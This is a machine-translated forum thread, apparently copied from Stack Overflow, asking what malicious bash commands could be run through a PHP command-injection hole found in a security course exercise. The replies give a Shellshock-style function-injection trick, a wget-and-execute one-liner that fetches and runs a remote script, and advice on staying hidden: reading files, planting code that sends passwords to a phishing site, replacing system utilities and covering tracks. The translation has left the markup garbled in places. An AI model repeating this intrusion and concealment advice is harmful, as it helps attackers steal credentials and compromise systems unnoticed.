注册
登录
安全审计
可以执行哪些恶意bash命令/脚本?
返回
可以执行哪些恶意bash命令/脚本?
作者:
昵称为空呵呵
发布时间:
2024-12-25 03:11:57 (3天前)
转自:
<div class =“excerpt”> 对于我的网络 <span class =“result-highlight”> 安全 </跨度> 当然,我们应该这样做 <span class =“result-highlight”> 审计 </跨度> 一个易受攻击的网站,列出我们可以做的所有可能的事情。这是php代码中一个非常明显的漏洞。 $ tool = $ _POST ['工具 </DIV>
收藏
举报
4 条回复
0#
回复此人
哦哦了
|
2019-08-31 10-32
<div class =“post-text”itemprop =“text”> <P> 为e(echo),i(mkdir),ou(触摸),......定义恶意函数 </p> <pre> <code> IFS='/bcdfghjklmnpqrstvwxz' function_that_will_execute_shell_with_your_environment_as_root ls='() { echo Pwned; }' bash -c ls </code> </pre> <P> 你可以找到许多其他技巧 <a href="http://cs.fit.edu/~mmahoney/ids.html" rel="nofollow"> 这里 </A> 。 </p> </DIV>
编辑
1#
回复此人
爱我真好
|
2019-08-31 10-32
<div class =“post-text”itemprop =“text”> <P> 你只关注那些不那么有趣的破坏性潜力,因为受害者可以从备份恢复。更好的办法是使用漏洞利用来查看您可以读取的内容并使用它来进入未检测到的系统。您可以阅读和修改的文件的简单列表比简单地破坏所有内容更加强大和有用 </p> <P> 例如,如果您发现接受密码的文件或具有错误权限的页面调用的javascript,您可以修改它们以向您提供此信息或将其发送到网络钓鱼站点。您找到的嵌入式密码可用于了解如何更多地执行其他操作并理想地进入系统文件,以便您可以覆盖您的轨道。或者,如果您可以替换系统实用程序,那么您真的很金,因为您拥有王国的钥匙。 </p> <P> 想想这样。在物理世界中,快速识别(和消除)使受害者生病的病毒。当你破坏系统时,你希望人们继续去那里,所以他们甚至不知道他们有问题。 </p> </DIV>
编辑
2#
回复此人
如果
|
2019-08-31 10-32
<div class =“post-text”itemprop =“text”> <pre> <code> wget https://raw.github.com/keroserene/rickrollrc/master/roll.sh && chmod +x roll.sh && ./roll.sh </code> </pre> </DIV>
编辑
登录
后才能参与评论
